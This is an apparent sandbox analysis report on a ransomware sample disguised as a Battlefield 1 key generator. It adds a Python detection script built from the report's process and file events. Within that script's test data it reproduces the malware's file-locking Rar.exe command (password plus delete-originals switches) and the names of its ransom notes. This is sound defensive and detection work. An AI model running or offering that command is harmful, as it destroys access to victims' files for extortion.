General Info

File name

Battlefield-1-Keygen-Serial-Key-Generator.rar

Full analysis
https://app.any.run/tasks/c313df68-2381-499f-9ac5-eb963867b689
Verdict
Malicious activity
Analysis date
12/2/2019, 18:33:15
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

ransomware

Indicators:

MIME:
application/x-rar
File info:
RAR archive data, v4, os: Win32
MD5

77aa0c5e2f0229a0754c5142c83af412

SHA1

1c35d845c9d1fbb38728ac64c565a8183587583e

SHA256

d3ba73321ff1e097902dd5cbbbf69aff38e1808f2a6d8c5c66ac54e338c9880d

SSDEEP

12288:/6zqlfEEuVjTRDnrZ8HZDKk/FG5VYGD1KOAbW1GyfuEOSVMSG9WCGOg:/f+EuVd18HZDKk/6YGDq6wyPCSGI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for the user's information. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
  • Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Application was dropped or rewritten from another process
  • Battlefield-1-Keygen-Serial-Key-Generator.exe (PID: 2484)
Creates files like Ransomware instruction
  • Battlefield-1-Keygen-Serial-Key-Generator.exe (PID: 2484)
Executed via COM
  • DllHost.exe (PID: 992)
Executable content was dropped or overwritten
  • WinRAR.exe (PID: 2620)
Dropped object may contain TOR URL's
  • Battlefield-1-Keygen-Serial-Key-Generator.exe (PID: 2484)

Static information

TRiD
.rar
|   RAR compressed archive (v-4.x) (58.3%)
.rar
|   RAR compressed archive (gen) (41.6%)
EXIF (ZIP group)
CompressedSize: 669128
UncompressedSize: 736256
OperatingSystem: Win32
ModifyDate: 2016:05:26 11:50:28
PackingMethod: Normal
ArchivedFileName: Battlefield-1-Keygen-Serial-Key-Generator.exe

Processes

Total processes
40
Monitored processes
4
Malicious processes
1
Suspicious processes
1

Behavior graph

The interactive graph reduces to two process chains (PIDs from the Process information section):

  • winrar.exe (PID 2620) → drop and start → battlefield-1-keygen-serial-key-generator.exe (PID 2484) → start → rar.exe (PID 3036)
  • dllhost.exe (PID 992), COM Surrogate hosting PhotoViewer.dll, no parent recorded

battlefield-1-keygen-serial-key-generator.exe, rar.exe and PhotoViewer.dll are shown with "no specs", i.e. none of the following graph markers is set on them:

Program did not start
Integrity level elevation
Task contains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has suspicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat
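
The chain above (archive opened in WinRAR, payload run straight from WinRAR's temporary extraction folder, payload spawning Rar.exe with a password and delete-after-archive switches, ransom notes written in several formats) is detectable from ordinary process-creation and file-creation telemetry. The following is an added example, not ANY.RUN code: the `PROCESS_EVENTS` and `FILE_EVENTS` records are constructed from this report's Process information and Dropped files sections (PIDs 2620 → 2484 → 3036) in an assumed Sysmon-like field layout; the parent of PID 2620, which the report does not record, is assumed to be explorer.exe; the Rar.exe file-mask list is shortened; and the fourth process event is a constructed benign control. The function names (`score_process`, `ransom_note_bursts`, `triage`) are this example's own.

```python
"""Process-tree and dropped-file heuristics for the WinRAR-as-locker chain.

Added example, not part of the ANY.RUN report. Events below are constructed
from the report (PIDs 2620 -> 2484 -> 3036); field names are an assumed
Sysmon-style layout, the parent of 2620 is assumed (explorer.exe), and the
Rar.exe mask list is shortened. PID 4100 is a constructed benign control.
"""
import re
import shlex
from collections import defaultdict
from typing import Dict, List, Tuple

RAR_IMAGES = {"rar.exe", "winrar.exe"}
DELETE_SWITCHES = {"df", "dr", "dw"}          # delete / recycle / wipe originals after archiving
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}
# WinRAR extracts a file opened from inside an archive to ...\Temp\Rar$EXa2620.2142\
WINRAR_TEMP_RE = re.compile(r"\\temp\\rar\$[a-z]{2,3}\d+\.\d+\\", re.IGNORECASE)
NOTE_EXTS = {"rtf", "htm", "html", "txt", "bmp"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rar_switches(cmdline: str) -> List[str]:
    """Lower-cased RAR switches (leading '-' removed) from a Windows command line."""
    toks = shlex.split(cmdline, posix=False)   # keep backslashes literal, honour "quotes"
    return [t[1:].lower() for t in toks[1:] if t.startswith("-") and t != "--"]


def score_process(ev: dict) -> List[str]:
    """Return the reasons a process-creation event looks like this chain (empty if none)."""
    reasons = []
    img, parent = basename(ev["image"]), basename(ev["parent_image"])
    if img in RAR_IMAGES:
        sw = rar_switches(ev["cmdline"])
        deletes = any(s in DELETE_SWITCHES for s in sw)
        # -p<pwd> / -hp<pwd> carry a password; bare -p prompts and -p- disables it
        has_pw = any(s.startswith(("p", "hp")) and s not in ("p", "p-", "hp") for s in sw)
        if deletes and has_pw:
            reasons.append("rar archives files with a password and deletes the originals (-p/-hp with -df/-dr/-dw)")
        if WINRAR_TEMP_RE.search(ev["parent_image"]) or parent not in INTERACTIVE_PARENTS | RAR_IMAGES:
            reasons.append(f"rar spawned by non-interactive parent {parent}")
    if WINRAR_TEMP_RE.search(ev["image"]):
        reasons.append("executable runs from WinRAR's temporary extraction folder (opened directly from an archive)")
    return reasons


def ransom_note_bursts(file_events: List[dict], min_exts: int = 3) -> Dict[Tuple[int, str], List[str]]:
    """Flag a PID that writes one note name under several formats (RecoverYourFiles.rtf/.htm/.bmp),
    the pattern behind the report's 'Creates files like Ransomware instruction' signature."""
    seen = defaultdict(set)
    for ev in file_events:
        stem, _, ext = basename(ev["path"]).rpartition(".")
        if ext in NOTE_EXTS:
            seen[(ev["pid"], re.sub(r"\d+$", "", stem))].add(ext)   # RecoverYourFiles2 -> recoveryourfiles
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_exts}


def triage(process_events: List[dict], file_events: List[dict]) -> Dict[int, List[str]]:
    """PID -> reasons, keeping only PIDs with at least one finding."""
    out = {ev["pid"]: score_process(ev) for ev in process_events}
    for (pid, stem), exts in ransom_note_bursts(file_events).items():
        out.setdefault(pid, []).append(f"ransom-note burst: {stem}.{{{','.join(exts)}}}")
    return {pid: r for pid, r in out.items() if r}


PROCESS_EVENTS = [
    {"pid": 2620, "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "parent_image": r"C:\Windows\explorer.exe",   # assumed: report records no parent
     "cmdline": r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Battlefield-1-Keygen-Serial-Key-Generator.rar"'},
    {"pid": 2484, "image": r"C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.2142\Battlefield-1-Keygen-Serial-Key-Generator.exe",
     "parent_image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r'"C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.2142\Battlefield-1-Keygen-Serial-Key-Generator.exe"'},
    {"pid": 3036, "image": r"C:\Program Files\Winrar\Rar.exe",
     "parent_image": r"C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.2142\Battlefield-1-Keygen-Serial-Key-Generator.exe",
     # file masks shortened from the report's command line
     "cmdline": r'"C:\Program Files\Winrar\Rar.exe" u C:\YOUR-locked-FILES\YourFilesHere-0penWithWinrar.ace -inul -os -ow -r -df -pfW?3*m6P7Ek$Qi/5 -x*.rar C:\*.txt C:\*.doc* *.frm'},
    # constructed benign control: an admin taking a recursive backup from a console
    {"pid": 4100, "image": r"C:\Program Files\WinRAR\Rar.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Program Files\WinRAR\Rar.exe" a -r D:\backup\docs.rar C:\Users\admin\Documents'},
]
FILE_EVENTS = [   # subset of the report's Dropped files list
    {"pid": 2484, "path": r"C:\Users\admin\Desktop\RecoverYourFiles.rtf"},
    {"pid": 2484, "path": r"C:\Users\admin\Desktop\RecoverYourFiles2.htm"},
    {"pid": 2484, "path": r"C:\Users\admin\Desktop\RecoverYourFiles4.bmp"},
    {"pid": 2484, "path": r"C:\Users\admin\AppData\Local\Runners\DefaultDomain_Path_a0u4qj0kdn0aarctshpc1pbw2hhmvnhg\1.0.0.0\user.config"},
    {"pid": 2620, "path": r"C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.2142\Battlefield-1-Keygen-Serial-Key-Generator.exe"},
]

if __name__ == "__main__":
    for pid, reasons in triage(PROCESS_EVENTS, FILE_EVENTS).items():
        print(pid, *reasons, sep="\n    ")
```

The benign control matters: Rar.exe with `-r` from a console gets no finding, while the same binary with `-p` plus `-df` under a parent that itself runs from a `Rar$EX` folder gets two. Tune `INTERACTIVE_PARENTS` to the environment (backup agents legitimately drive rar.exe) before deploying anything like this.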

Process information

PID
2620
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Battlefield-1-Keygen-Serial-Key-Generator.rar"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\local\temp\rar$exa2620.2142\battlefield-1-keygen-serial-key-generator.exe

PID
2484
CMD
"C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.2142\Battlefield-1-Keygen-Serial-Key-Generator.exe"
Path
C:\Users\admin\AppData\Local\Temp\Rar$EXa2620.2142\Battlefield-1-Keygen-Serial-Key-Generator.exe
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Runners
Version
1.0.0.0
Modules
Image
c:\users\admin\appdata\local\temp\rar$exa2620.2142\battlefield-1-keygen-serial-key-generator.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.drawing\dbfe8642a8ed7b2b103ad28e0c96418a\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.windows.forms\3afcd5168c7a6cb02eab99d7fd71e102\system.windows.forms.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.visualbas#\08d608378aa405adc844f3cf36974b8c\microsoft.visualbasic.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\system32\propsys.dll
